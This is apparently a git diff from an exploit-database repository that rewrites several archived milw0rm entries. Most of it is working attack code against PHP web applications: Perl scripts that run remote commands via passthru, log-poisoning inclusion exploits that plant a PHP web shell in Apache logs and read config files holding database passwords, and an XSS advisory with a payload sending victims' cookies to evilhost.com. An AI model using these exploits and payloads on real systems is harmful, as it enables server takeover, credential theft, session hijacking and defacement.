+    curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get);
+
+    $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n");
+    preg_match("/<title>([0-9a-f]{32})<\/title>/", $xss_source, $xss_output);
+    
+    if ($xss_output[0])
+    {
+        echo "oo password       " . $xss_output[1] . "\n\n";
+        echo "oo dafaced ...\n";
+    }
+
+    curl_close ($xss_connection); 
+}
+
+xss_init();
+xss_header();
+xss_exploit();
+xss_bottom();
+?>
+
+# milw0rm.com [2006-03-08]
diff --git a/platforms/php/webapps/1570.pl b/platforms/php/webapps/1570.pl
index b0542abfc..86b6733c9 100755
--- a/platforms/php/webapps/1570.pl
+++ b/platforms/php/webapps/1570.pl
@@ -1,43 +1,43 @@
-#!/usr/bin/perl
-#
-# Light Weight Calendar
-# Exploit by Hessam-x (www.hessamx.net)
-#
-######################################################
-#  ___ ___                __                         #
-# /   |   \_____    ____ |  | __ ___________________ #
-#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
-#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
-# \___|_  /(____  /\___  >__|_ \\___  >__|  /_____ \ #
-#       \/      \/     \/     \/    \/            \/ #
-#             Iran Hackerz Security Team             #
-#               WebSite: www.hackerz.ir              #
-#                                                    #
-######################################################
-# Name    : Light Weight Calendar                    #
-# version : 1.*                                      #
-######################################################
-use LWP::Simple;
-
-print "-------------------------------------------\n";
-print "=          Light Weight Calendar          =\n";
-print "=       By Hessam-x  - www.hackerz.ir     =\n";
-print "-------------------------------------------\n\n";
-
-      print "Target(www.example.com)\> ";
-      chomp($targ = <STDIN>);
-
-      print "path: (/lwc/)\>";
-      chomp($path=<STDIN>);
-
-while()
-{
-
-     print "command:\>";
-     chomp($comd=<STDIN>);
-     $expl="index.php?hx=".$comd."&date=passthru%28%24_GET%5Bhx%5D%29";
-     $page=get("http://".$targ.$path.$expl) || die "[-] Exploit failed ...\n";
-
-}
-
-# milw0rm.com [2006-03-09]
+#!/usr/bin/perl
+#
+# Light Weight Calendar
+# Exploit by Hessam-x (www.hessamx.net)
+#
+######################################################
+#  ___ ___                __                         #
+# /   |   \_____    ____ |  | __ ___________________ #
+#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
+#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
+# \___|_  /(____  /\___  >__|_ \\___  >__|  /_____ \ #
+#       \/      \/     \/     \/    \/            \/ #
+#             Iran Hackerz Security Team             #
+#               WebSite: www.hackerz.ir              #
+#                                                    #
+######################################################
+# Name    : Light Weight Calendar                    #
+# version : 1.*                                      #
+######################################################
+use LWP::Simple;
+
+print "-------------------------------------------\n";
+print "=          Light Weight Calendar          =\n";
+print "=       By Hessam-x  - www.hackerz.ir     =\n";
+print "-------------------------------------------\n\n";
+
+      print "Target(www.example.com)\> ";
+      chomp($targ = <STDIN>);
+
+      print "path: (/lwc/)\>";
+      chomp($path=<STDIN>);
+
+while()
+{
+
+     print "command:\>";
+     chomp($comd=<STDIN>);
+     $expl="index.php?hx=".$comd."&date=passthru%28%24_GET%5Bhx%5D%29";
+     $page=get("http://".$targ.$path.$expl) || die "[-] Exploit failed ...\n";
+
+}
+
+# milw0rm.com [2006-03-09]
diff --git a/platforms/php/webapps/1575.pl b/platforms/php/webapps/1575.pl
index 3c17ad507..0252ecdb9 100755
--- a/platforms/php/webapps/1575.pl
+++ b/platforms/php/webapps/1575.pl
@@ -1,181 +1,181 @@
-#!/usr/bin/perl
-use IO::Socket;
-
-print "guestbook script <= 1.7 exploit\r\n";
-print "rgod rgod\@autistici.org\r\n";
-print "dork: \"powered by guestbook script\"\r\n\r\n";
-
-# short explaination:
-# we have this code in nearly all scripts:
-# ...
-# if (isset ($include_files) and is_array ($include_files)) {
-#              reset ($include_files);
-#              while(list($key, $val) = each($include_files))
-#              {
-#
-#                  if ($file_content = include_content($val)) {
-#                      $$key = $file_content;
-#                  } else {
-#                      $$key = '<pre>[' . $txt['txt_file_not_found'] . ': ' . $val . ']</pre>';
-#                  }
-#                  $tpl->register('guest', $key);
-#              }
-#          }
-#...
-# here is include_content() function:
-#
-# function include_content($path)
-#          {
-#
-#              if (is_file($path)) {
-#                  ob_start();
-#
-#                  include($path);
-#                  $content = ob_get_contents();
-#                  ob_end_clean();
-#              }
-#
-#              if (isset($content)) {
-#                  return $content;
-#              }
-#          }
-#
-# you can include code from local resources and (on PHP5, because is_file()
-# function support ftp wrappers) remote resources, poc:
-#
-# http://[target]/[path]/index.php?include_files[]=&include_files[1]=/var/log/httpd/access_log
-# http://[target]/[path]/index.php?include_files[]=&include_files[1]=ftp://username:pass@192.168.1.3/suntzu.php
-#
-# you will not see any output, but code inside the included file will be executed.
-# You shoul have a "die()" in included file (to prevent the ob_end_clean() call)
-# to see some results...
-# This exploit supports two actions:
-#
-# [1] tries to inject some php code in log files and execute it
-# [2] tries to include the code from a ftp location
-
-
-sub main::urlEncode {
-    my ($string) = @_;
-    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
-    #$string# =~ tr/.//;
-    return $string;
- }
-
-if (@ARGV < 4)
-{
-print "Usage:\r\n";
-print "perl gbs_17_xpl.pl SERVER PATH ACTION[FTP LOCATION] COMMAND\r\n\r\n";
-print "SERVER         - Server where Guestbook Script is installed.\r\n";
-print "PATH           - Path to Guestbook Script (ex: /gbs/ or just /)\r\n";
-print "ACTION         - 1[nothing]\r\n";
-print "                 (tries to include apache error.log file)\r\n\r\n";
-print "                 2[ftp site with the code to include]\r\n\r\n";
-print "COMMAND        - A shell command (\"cat config.php\"\r\n";
-print "                 to see database username & password)\r\n\r\n";
-print "Example:\r\n";
-print "perl gbs_17_xpl.pl 192.168.1.3 /gbs/ 1 cat config.php\r\n";
-print "perl gbs_17_xpl.pl 192.168.1.3 /gbs/ 2ftp://username:password\@192.168.1";
-print ".3/suntzu.php ls -la\r\n\r\n";
-print "Note: to launch action [2] you need this code in suntzu.php :\r\n";
-print "<?php\r\n";
-print "ob_clean();\r\n";
-print "echo 666;\r\n";
-print "if (get_magic_quotes_gpc())\r\n";
-print "{\$_GET[cmd]=stripslashes(\$_GET[cmd]);}\r\n";
-print "passthru(\$_GET[cmd]);\r\n";
-print "echo 666;\r\n";
-print "die;\r\n";
-print "?>\r\n\r\n";
-exit();
-}
-
-$serv=$ARGV[0];
-$path=$ARGV[1];
-$ACTION=urlEncode($ARGV[2]);
-$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
-$temp=substr($ACTION,0,1);
-
-if ($temp==2) { #this works with PHP5 and allow_url_fopen=On
-  $FTP=substr($ACTION,1,length($ACTION));
-  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
-  or die "[+] Connecting ... Could not connect to host.\n\n";
-  print $sock "GET ".$path."index.php?cmd=".$cmd."&include_files[]=&include_files[1]=".$FTP." HTTP/1.1\r\n";
-  print $sock "Host: ".$serv."\r\n";
-  print $sock "Connection: close\r\n\r\n";
-  $out="";
-  while ($answer = <$sock>) {
-    $out.=$answer;
-  }
-  close($sock);
-  @temp= split /666/,$out,3;
-  if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
-         else {print "\r\nExploit failed...\r\n";}
-
-} elsif ($temp==1) { #this works if path to log files is found and u can have access to them
-  print "[1] Injecting some code in log files ...\r\n";
-  $CODE="<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {\$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);echo 666;die;?>";
-  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
-  or die "[+] Connecting ... Could not connect to host.\n\n";
-  print $sock "GET ".$path.$CODE." HTTP/1.1\r\n";
-  print $sock "User-Agent: ".$CODE."\r\n";
-  print $sock "Host: ".$serv."\r\n";
-  print $sock "Connection: close\r\n\r\n";
-  close($sock);
-
-  # fill with possible locations
-  my @paths= (
-  "/var/log/httpd/access_log",         #Fedora, default
-  "/var/log/httpd/error_log",          #...
-  "../apache/logs/error.log",          #Windows
-  "../apache/logs/access.log",
-  "../../apache/logs/error.log",
-  "../../apache/logs/access.log",
-  "../../../apache/logs/error.log",
-  "../../../apache/logs/access.log",  #and so on... collect some log paths, you will succeed
-  "/etc/httpd/logs/acces_log",
-  "/etc/httpd/logs/acces.log",
-  "/etc/httpd/logs/error_log",
-  "/etc/httpd/logs/error.log",
-  "/var/www/logs/access_log",
-  "/var/www/logs/access.log",
-  "/usr/local/apache/logs/access_log",
-  "/usr/local/apache/logs/access.log",
-  "/var/log/apache/access_log",
-  "/var/log/apache/access.log",
-  "/var/log/access_log",
-  "/var/www/logs/error_log",
-  "/var/www/logs/error.log",
-  "/usr/local/apache/logs/error_log",
-  "/usr/local/apache/logs/error.log",
-  "/var/log/apache/error_log",
-  "/var/log/apache/error.log",
-  "/var/log/access_log",
-  "/var/log/error_log"
-  );
-
-  for ($i=0; $i<=$#paths; $i++)
-  {
-    $a = $i + 2;
-    print "[".$a."] trying with ".$paths[$i]."\r\n";
-    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
-    or die "[+] Connecting ... Could not connect to host.\n\n";
-    print $sock "GET ".$path."index.php?cmd=".$cmd."&include_files[]=&include_files[1]=".urlEncode($paths[$i])." HTTP/1.1\r\n";
-    print $sock "Host: ".$serv."\r\n";
-    print $sock "Connection: close\r\n\r\n";
-    $out='';
-    while ($answer = <$sock>) {
-    $out.=$answer;
-    }
-    close($sock);
-    @temp= split /666/,$out,3;
-    if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
-
-  }
-  #if you are here...
-  print "\r\nExploit failed...\r\n";
-} else {
-  print "No action specified ...\r\n";
-}
-
-# milw0rm.com [2006-03-11]
+#!/usr/bin/perl
+use IO::Socket;
+
+print "guestbook script <= 1.7 exploit\r\n";
+print "rgod rgod\@autistici.org\r\n";
+print "dork: \"powered by guestbook script\"\r\n\r\n";
+
+# short explaination:
+# we have this code in nearly all scripts:
+# ...
+# if (isset ($include_files) and is_array ($include_files)) {
+#              reset ($include_files);
+#              while(list($key, $val) = each($include_files))
+#              {
+#
+#                  if ($file_content = include_content($val)) {
+#                      $$key = $file_content;
+#                  } else {
+#                      $$key = '<pre>[' . $txt['txt_file_not_found'] . ': ' . $val . ']</pre>';
+#                  }
+#                  $tpl->register('guest', $key);
+#              }
+#          }
+#...
+# here is include_content() function:
+#
+# function include_content($path)
+#          {
+#
+#              if (is_file($path)) {
+#                  ob_start();
+#
+#                  include($path);
+#                  $content = ob_get_contents();
+#                  ob_end_clean();
+#              }
+#
+#              if (isset($content)) {
+#                  return $content;
+#              }
+#          }
+#
+# you can include code from local resources and (on PHP5, because is_file()
+# function support ftp wrappers) remote resources, poc:
+#
+# http://[target]/[path]/index.php?include_files[]=&include_files[1]=/var/log/httpd/access_log
+# http://[target]/[path]/index.php?include_files[]=&include_files[1]=ftp://username:pass@192.168.1.3/suntzu.php
+#
+# you will not see any output, but code inside the included file will be executed.
+# You shoul have a "die()" in included file (to prevent the ob_end_clean() call)
+# to see some results...
+# This exploit supports two actions:
+#
+# [1] tries to inject some php code in log files and execute it
+# [2] tries to include the code from a ftp location
+
+
+sub main::urlEncode {
+    my ($string) = @_;
+    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
+    #$string# =~ tr/.//;
+    return $string;
+ }
+
+if (@ARGV < 4)
+{
+print "Usage:\r\n";
+print "perl gbs_17_xpl.pl SERVER PATH ACTION[FTP LOCATION] COMMAND\r\n\r\n";
+print "SERVER         - Server where Guestbook Script is installed.\r\n";
+print "PATH           - Path to Guestbook Script (ex: /gbs/ or just /)\r\n";
+print "ACTION         - 1[nothing]\r\n";
+print "                 (tries to include apache error.log file)\r\n\r\n";
+print "                 2[ftp site with the code to include]\r\n\r\n";
+print "COMMAND        - A shell command (\"cat config.php\"\r\n";
+print "                 to see database username & password)\r\n\r\n";
+print "Example:\r\n";
+print "perl gbs_17_xpl.pl 192.168.1.3 /gbs/ 1 cat config.php\r\n";
+print "perl gbs_17_xpl.pl 192.168.1.3 /gbs/ 2ftp://username:password\@192.168.1";
+print ".3/suntzu.php ls -la\r\n\r\n";
+print "Note: to launch action [2] you need this code in suntzu.php :\r\n";
+print "<?php\r\n";
+print "ob_clean();\r\n";
+print "echo 666;\r\n";
+print "if (get_magic_quotes_gpc())\r\n";
+print "{\$_GET[cmd]=stripslashes(\$_GET[cmd]);}\r\n";
+print "passthru(\$_GET[cmd]);\r\n";
+print "echo 666;\r\n";
+print "die;\r\n";
+print "?>\r\n\r\n";
+exit();
+}
+
+$serv=$ARGV[0];
+$path=$ARGV[1];
+$ACTION=urlEncode($ARGV[2]);
+$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
+$temp=substr($ACTION,0,1);
+
+if ($temp==2) { #this works with PHP5 and allow_url_fopen=On
+  $FTP=substr($ACTION,1,length($ACTION));
+  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
+  or die "[+] Connecting ... Could not connect to host.\n\n";
+  print $sock "GET ".$path."index.php?cmd=".$cmd."&include_files[]=&include_files[1]=".$FTP." HTTP/1.1\r\n";
+  print $sock "Host: ".$serv."\r\n";
+  print $sock "Connection: close\r\n\r\n";
+  $out="";
+  while ($answer = <$sock>) {
+    $out.=$answer;
+  }
+  close($sock);
+  @temp= split /666/,$out,3;
+  if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
+         else {print "\r\nExploit failed...\r\n";}
+
+} elsif ($temp==1) { #this works if path to log files is found and u can have access to them
+  print "[1] Injecting some code in log files ...\r\n";
+  $CODE="<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {\$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);echo 666;die;?>";
+  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
+  or die "[+] Connecting ... Could not connect to host.\n\n";
+  print $sock "GET ".$path.$CODE." HTTP/1.1\r\n";
+  print $sock "User-Agent: ".$CODE."\r\n";
+  print $sock "Host: ".$serv."\r\n";
+  print $sock "Connection: close\r\n\r\n";
+  close($sock);
+
+  # fill with possible locations
+  my @paths= (
+  "/var/log/httpd/access_log",         #Fedora, default
+  "/var/log/httpd/error_log",          #...
+  "../apache/logs/error.log",          #Windows
+  "../apache/logs/access.log",
+  "../../apache/logs/error.log",
+  "../../apache/logs/access.log",
+  "../../../apache/logs/error.log",
+  "../../../apache/logs/access.log",  #and so on... collect some log paths, you will succeed
+  "/etc/httpd/logs/acces_log",
+  "/etc/httpd/logs/acces.log",
+  "/etc/httpd/logs/error_log",
+  "/etc/httpd/logs/error.log",
+  "/var/www/logs/access_log",
+  "/var/www/logs/access.log",
+  "/usr/local/apache/logs/access_log",
+  "/usr/local/apache/logs/access.log",
+  "/var/log/apache/access_log",
+  "/var/log/apache/access.log",
+  "/var/log/access_log",
+  "/var/www/logs/error_log",
+  "/var/www/logs/error.log",
+  "/usr/local/apache/logs/error_log",
+  "/usr/local/apache/logs/error.log",
+  "/var/log/apache/error_log",
+  "/var/log/apache/error.log",
+  "/var/log/access_log",
+  "/var/log/error_log"
+  );
+
+  for ($i=0; $i<=$#paths; $i++)
+  {
+    $a = $i + 2;
+    print "[".$a."] trying with ".$paths[$i]."\r\n";
+    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
+    or die "[+] Connecting ... Could not connect to host.\n\n";
+    print $sock "GET ".$path."index.php?cmd=".$cmd."&include_files[]=&include_files[1]=".urlEncode($paths[$i])." HTTP/1.1\r\n";
+    print $sock "Host: ".$serv."\r\n";
+    print $sock "Connection: close\r\n\r\n";
+    $out='';
+    while ($answer = <$sock>) {
+    $out.=$answer;
+    }
+    close($sock);
+    @temp= split /666/,$out,3;
+    if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
+
+  }
+  #if you are here...
+  print "\r\nExploit failed...\r\n";
+} else {
+  print "No action specified ...\r\n";
+}
+
+# milw0rm.com [2006-03-11]
diff --git a/platforms/php/webapps/1576.txt b/platforms/php/webapps/1576.txt
index a4ebbf874..d8877ee26 100755
--- a/platforms/php/webapps/1576.txt
+++ b/platforms/php/webapps/1576.txt
@@ -1,35 +1,35 @@
-Jupiter CMS <= 1.1.5 multiple XSS attack vectors.
-
-Discovered by: Nomenumbra/[0x4F4C] Date: 3/11/2006 impact:high (privilege escalation,site defacement)
-
-Jupiter CMS (http://www.highstrike.net/) is a dynamic CMS system like mambo or limbo, allowing users
-to subscribe and posts events. Because no filtering is done upon [image] BBcode input, any user is
-capable of inserting arbitrary javascript code, allowing for credential theft leading/session
-hijacking and possibly site defacement.
-
-Examples:
-
-This would make a messagebox pop up saying 'XSS', whenever the events get loaded (on the main page,
-calender,etc): [image=javascript:alert('XSS')]
-
-This would allow an attacker to steal session ID's, which he could insert into his own cookie to
-hijack sessions and elevate his/her privileges:
-
-[image=javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)]
-
-It would be used with SjaakRake's cookie stealer (http://www.milw0rm.com/exploits/1103), with maybe
-the addition of a header("location: ".<anythinghere>), to redirect the user to a page of your choice,
-to avoid suspicion and disclosure of your cookiestealer's location.
-
-This injections would allow an attacker to redirect users to a page of his choice, effectively
-defacing the page:
-
-[image=javascript:window.navigate('http://www.evilhost.com/pwned.html')]
-
-As you can see the possibilities are limitless, as long as you have a bit of fantasy!
-
-Nomenumbra/[0x4F4C]
-
-Questions: zerogue@gmail.com Site: http://0x4f4c.awardspace.com
-
-# milw0rm.com [2006-03-11]
+Jupiter CMS <= 1.1.5 multiple XSS attack vectors.
+
+Discovered by: Nomenumbra/[0x4F4C] Date: 3/11/2006 impact:high (privilege escalation,site defacement)
+
+Jupiter CMS (http://www.highstrike.net/) is a dynamic CMS system like mambo or limbo, allowing users
+to subscribe and posts events. Because no filtering is done upon [image] BBcode input, any user is
+capable of inserting arbitrary javascript code, allowing for credential theft leading/session
+hijacking and possibly site defacement.
+
+Examples:
+
+This would make a messagebox pop up saying 'XSS', whenever the events get loaded (on the main page,
+calender,etc): [image=javascript:alert('XSS')]
+
+This would allow an attacker to steal session ID's, which he could insert into his own cookie to
+hijack sessions and elevate his/her privileges:
+
+[image=javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)]
+
+It would be used with SjaakRake's cookie stealer (http://www.milw0rm.com/exploits/1103), with maybe
+the addition of a header("location: ".<anythinghere>), to redirect the user to a page of your choice,
+to avoid suspicion and disclosure of your cookiestealer's location.
+
+This injections would allow an attacker to redirect users to a page of his choice, effectively
+defacing the page:
+
+[image=javascript:window.navigate('http://www.evilhost.com/pwned.html')]
+
+As you can see the possibilities are limitless, as long as you have a bit of fantasy!
+
+Nomenumbra/[0x4F4C]
+
+Questions: zerogue@gmail.com Site: http://0x4f4c.awardspace.com
+
+# milw0rm.com [2006-03-11]
diff --git a/platforms/php/webapps/1581.pl b/platforms/php/webapps/1581.pl
index 5d1f33ba2..5718cbbcd 100755
--- a/platforms/php/webapps/1581.pl
+++ b/platforms/php/webapps/1581.pl
@@ -1,126 +1,126 @@
-#!/usr/bin/perl
-use IO::Socket;
-
-print "Simple PHP Blog <= 0.4.7.1 cmmnds xctn exploit\r\n";
-print "through arbitrary local inclusion\r\n";
-print "rgod rgod\@autistici.org\r\n";
-print "-> this works with magic_quotes_gpc = Off\r\n\r\n";
-
-# short explaination:
-# we have this code in install05.php:
-# <?php
-#	require_once('scripts/sb_functions.php');
-#	global $logged_in;
-#	$logged_in = logged_in( false, false );
-#
-#	read_config();
-#
-#	global $blog_config;
-#	if ( isset( $_GET[ 'blog_language' ] ) ) {
-#		$blog_config[ 'blog_language' ] = $_GET[ 'blog_language' ];
-#	}
-#
-#	require_once('languages/' . $blog_config[ 'blog_language' ] . '/strings.php');
-#	sb_language( 'install05' );
-# ?>
-# ...
-#
-# script is not deleted after installation, so, if magic_quotes_gpc = Off,
-# you can include an arbitrary file from local resources, poc:
-#
-# http://[target]/[path_to_blog]/install05.php?blog_language=../../../../../../etc/passwd%00
-#
-# (breaking path through a null char)
-#
-# it seems you cannot inject php code (php tags are converted to html entities)
-# in SPB resources, but you can inject a shell in Apache logs, so... :
-#
-# http://[target]/[path]/install05.php?blog_language=../../../../../../var/log/httpd/access_log%00&cmd=ls%20-la
-
-sub main::urlEncode {
-    my ($string) = @_;
-    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
-    #$string# =~ tr/.//;
-    return $string;
- }
-
-if (@ARGV < 3)
-{
-print "Usage:\r\n";
-print "perl spb_0471_incl.pl SERVER PATH COMMAND\r\n\r\n";
-print "SERVER         - Server where Simple PHP Blog is installed.\r\n";
-print "PATH           - Path to Simple PHP Blog (ex: /spb/ or just /)\r\n";
-print "COMMAND        - A shell command (\"cat ./config/password.php\"\r\n";
-print "                 to see encrypted username & password)\r\n\r\n";
-print "Example:\r\n";
-print "perl spb_0471_incl.pl 192.168.1.3 /gbs/ ls -la\r\n";
-exit();
-}
-
-$serv=$ARGV[0];
-$path=$ARGV[1];
-$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
-
-print "[1] Injecting some code in log files ...\r\n";
-$CODE="<?php ob_clean();echo 666;passthru(\$_GET[cmd]);echo 666;die;?>";
-$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
-or die "[+] Connecting ... Could not connect to host.\n\n";
-print $sock "GET ".$path.$CODE." HTTP/1.1\r\n";
-print $sock "User-Agent: ".$CODE."\r\n";
-print $sock "Host: ".$serv."\r\n";
-print $sock "Connection: close\r\n\r\n";
-close($sock);
-
-# fill with possible locations
-my @paths= (
-"../../../../../../../../../../var/log/httpd/access_log",
-"../../../../../../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../../../../../../../etc/httpd/logs/acces_log",
-"../../../../../../../../../../etc/httpd/logs/acces.log",
-"../../../../../../../../../../etc/httpd/logs/error_log",
-"../../../../../../../../../../etc/httpd/logs/error.log",
-"../../../../../../../../../../var/www/logs/access_log",
-"../../../../../../../../../../var/www/logs/access.log",
-"../../../../../../../../../../usr/local/apache/logs/access_log",
-"../../../../../../../../../../usr/local/apache/logs/access.log",
-"../../../../../../../../../../var/log/apache/access_log",
-"../../../../../../../../../../var/log/apache/access.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/www/logs/error_log",
-"../../../../../../../../../../var/www/logs/error.log",
-"../../../../../../../../../../usr/local/apache/logs/error_log",
-"../../../../../../../../../../usr/local/apache/logs/error.log",
-"../../../../../../../../../../var/log/apache/error_log",
-"../../../../../../../../../../var/log/apache/error.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/log/error_log"
-);
-
-  for ($i=0; $i<=$#paths; $i++)
-  {
-    $a = $i + 2;
-    print "[".$a."] trying with ".$paths[$i]."%00 for blog_language argument...\r\n";
-    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
-    or die "[+] Connecting ... Could not connect to host.\n\n";
-    print $sock "GET ".$path."install05.php?cmd=".$cmd."&blog_language=".urlEncode($paths[$i])."%00 HTTP/1.1\r\n";
-    print $sock "Host: ".$serv."\r\n";
-    print $sock "Connection: close\r\n\r\n";
-    $out='';
-    while ($answer = <$sock>) {
-    $out.=$answer;
-    }
-    close($sock);
-    @temp= split /666/,$out,3;
-    if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
-
-  }
-  #if you are here...
-  print "\r\nExploit failed...\r\n";
-
-# milw0rm.com [2006-03-13]
+#!/usr/bin/perl
+use IO::Socket;
+
+print "Simple PHP Blog <= 0.4.7.1 cmmnds xctn exploit\r\n";
+print "through arbitrary local inclusion\r\n";
+print "rgod rgod\@autistici.org\r\n";
+print "-> this works with magic_quotes_gpc = Off\r\n\r\n";
+
+# short explaination:
+# we have this code in install05.php:
+# <?php
+#	require_once('scripts/sb_functions.php');
+#	global $logged_in;
+#	$logged_in = logged_in( false, false );
+#
+#	read_config();
+#
+#	global $blog_config;
+#	if ( isset( $_GET[ 'blog_language' ] ) ) {
+#		$blog_config[ 'blog_language' ] = $_GET[ 'blog_language' ];
+#	}
+#
+#	require_once('languages/' . $blog_config[ 'blog_language' ] . '/strings.php');
+#	sb_language( 'install05' );
+# ?>
+# ...
+#
+# script is not deleted after installation, so, if magic_quotes_gpc = Off,
+# you can include an arbitrary file from local resources, poc:
+#
+# http://[target]/[path_to_blog]/install05.php?blog_language=../../../../../../etc/passwd%00
+#
+# (breaking path through a null char)
+#
+# it seems you cannot inject php code (php tags are converted to html entities)
+# in SPB resources, but you can inject a shell in Apache logs, so... :
+#
+# http://[target]/[path]/install05.php?blog_language=../../../../../../var/log/httpd/access_log%00&cmd=ls%20-la
+
+sub main::urlEncode {
+    my ($string) = @_;
+    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
+    #$string# =~ tr/.//;
+    return $string;
+ }
+
+if (@ARGV < 3)
+{
+print "Usage:\r\n";
+print "perl spb_0471_incl.pl SERVER PATH COMMAND\r\n\r\n";
+print "SERVER         - Server where Simple PHP Blog is installed.\r\n";
+print "PATH           - Path to Simple PHP Blog (ex: /spb/ or just /)\r\n";
+print "COMMAND        - A shell command (\"cat ./config/password.php\"\r\n";
+print "                 to see encrypted username & password)\r\n\r\n";
+print "Example:\r\n";
+print "perl spb_0471_incl.pl 192.168.1.3 /gbs/ ls -la\r\n";
+exit();
+}
+
+$serv=$ARGV[0];
+$path=$ARGV[1];
+$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
+
+print "[1] Injecting some code in log files ...\r\n";
+$CODE="<?php ob_clean();echo 666;passthru(\$_GET[cmd]);echo 666;die;?>";
+$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
+or die "[+] Connecting ... Could not connect to host.\n\n";
+print $sock "GET ".$path.$CODE." HTTP/1.1\r\n";
+print $sock "User-Agent: ".$CODE."\r\n";
+print $sock "Host: ".$serv."\r\n";
+print $sock "Connection: close\r\n\r\n";
+close($sock);
+
+# fill with possible locations
+my @paths= (
+"../../../../../../../../../../var/log/httpd/access_log",
+"../../../../../../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../../../../../../../etc/httpd/logs/acces_log",
+"../../../../../../../../../../etc/httpd/logs/acces.log",
+"../../../../../../../../../../etc/httpd/logs/error_log",
+"../../../../../../../../../../etc/httpd/logs/error.log",
+"../../../../../../../../../../var/www/logs/access_log",
+"../../../../../../../../../../var/www/logs/access.log",
+"../../../../../../../../../../usr/local/apache/logs/access_log",
+"../../../../../../../../../../usr/local/apache/logs/access.log",
+"../../../../../../../../../../var/log/apache/access_log",
+"../../../../../../../../../../var/log/apache/access.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/www/logs/error_log",
+"../../../../../../../../../../var/www/logs/error.log",
+"../../../../../../../../../../usr/local/apache/logs/error_log",
+"../../../../../../../../../../usr/local/apache/logs/error.log",
+"../../../../../../../../../../var/log/apache/error_log",
+"../../../../../../../../../../var/log/apache/error.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/log/error_log"
+);
+
+  for ($i=0; $i<=$#paths; $i++)
+  {
+    $a = $i + 2;
+    print "[".$a."] trying with ".$paths[$i]."%00 for blog_language argument...\r\n";
+    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
+    or die "[+] Connecting ... Could not connect to host.\n\n";
+    print $sock "GET ".$path."install05.php?cmd=".$cmd."&blog_language=".urlEncode($paths[$i])."%00 HTTP/1.1\r\n";
+    print $sock "Host: ".$serv."\r\n";
+    print $sock "Connection: close\r\n\r\n";
+    $out='';
+    while ($answer = <$sock>) {
+    $out.=$answer;
+    }
+    close($sock);
+    @temp= split /666/,$out,3;
+    if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
+
+  }
+  #if you are here...
+  print "\r\nExploit failed...\r\n";
+
+# milw0rm.com [2006-03-13]
diff --git a/platforms/php/webapps/1585.php b/platforms/php/webapps/1585.php
index 965ced397..79b2e5a11 100755
--- a/platforms/php/webapps/1585.php
+++ b/platforms/php/webapps/1585.php
@@ -1,178 +1,178 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "php iCalendar <=2.21 \"cookie_language\"/\"cookie_style\" remote cmmnds xctn\r\n";
-echo "-> arbitrary local inclusion through cookies\r\n";
-echo "by rgod rgod<AT>autistici<DOT>org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-
-# short explaination: phpICal stores language & template user preferences inside
-# cookies. Theese values are used to include files, but there is no check for
-# "../" chars... also you can break path trough a null char (%00) regardless of any
-# magic_quotes_gpc settings, because they are serialized & we have a stripslashes
-# on them. This code inject a shell in Apache log files, then tries to include
-# it through phpicalendar[cookie_language] & phpicalendar[cookie_style] cookies
-
-if ($argc<3) {
